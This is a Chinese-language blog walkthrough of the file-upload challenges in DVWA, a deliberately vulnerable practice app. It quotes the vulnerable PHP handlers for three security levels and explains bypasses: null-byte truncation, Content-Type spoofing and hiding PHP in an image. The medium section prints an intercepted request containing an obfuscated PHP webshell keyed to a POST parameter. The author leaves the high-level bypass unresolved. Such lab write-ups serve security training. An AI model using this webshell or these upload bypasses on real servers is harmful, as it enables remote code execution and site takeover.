DWVA上传漏洞挖掘的测试例子

作者：袖梨 2022-06-24

low：

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '

Your image was not uploaded.

';
    }
    else {
        // Yes!
        echo "

{$target_path} succesfully uploaded!

";
}
}

?>
没有对文件类型进行限制，直接将php文件上传，之后访问：http://localhost/hackable/uploads/XX.php即可。

medium：

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '

Your image was not uploaded.

';
        }
        else {
            // Yes!
            echo "

{$target_path} succesfully uploaded!

";
        }
    }
    else {
        // Invalid file
        echo '

Your image was not uploaded. We can only accept JPEG or PNG images.

';
}
}

?>
对上传的文件进行限制。
解决方法1：用burp suite进行00截断，将文件名改为1.php .jpg（注意中间有空格）然后在拦截中将空格改为00。
解决方法2：直接上传2.php文件之后进行拦截，数据包如下

POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549

-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream

$item['wind'] = 'assert';

$array[] = $item;

$array[0]['wind']($_POST['loveautumn']);

?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------143381619322555--
将红色的部分修改成：Content-Type: image/jpeg即可绕过。

High：

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '

Your image was not uploaded.

';
        }
        else {
            // Yes!
            echo "

{$target_path} succesfully uploaded!

";
        }
    }
    else {
        // Invalid file
        echo '

Your image was not uploaded. We can only accept JPEG or PNG images.

';
}
}

?>
对图片的命名和类型进行了严格的限制，那么可以用文件头欺骗的方式来解决这个问题。另外，假设文件名为1.php.png，strrpos会截取.出现的最后位置是5，之后substr从第六位开始重新命名文件名，也就是最终上传的文件名会被改成png，会被拦截掉。
首先使用记事本对正常图片文件编辑，将php一句话代码写到图片最下面，保存。这样就可以欺骗文件类型的检测。
最后对文件名的重命名进行绕过。将文件名改为1.php .png上传，用burpsuite拦截：
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"部分修改为
Content-Disposition: form-data; name="uploaded"; filename="1.phpX00.php .png"的话可以获得一个x00.php .png文件，这个是之前有php任意文件上传漏洞的文章中提到过的。对空格截断无效。目前不知道最终答案，可能是上传一个含有一句话的jpg文件之后采用文件包含来完成？暂时存疑

DWVA上传漏洞挖掘的测试例子

相关文章

精彩推荐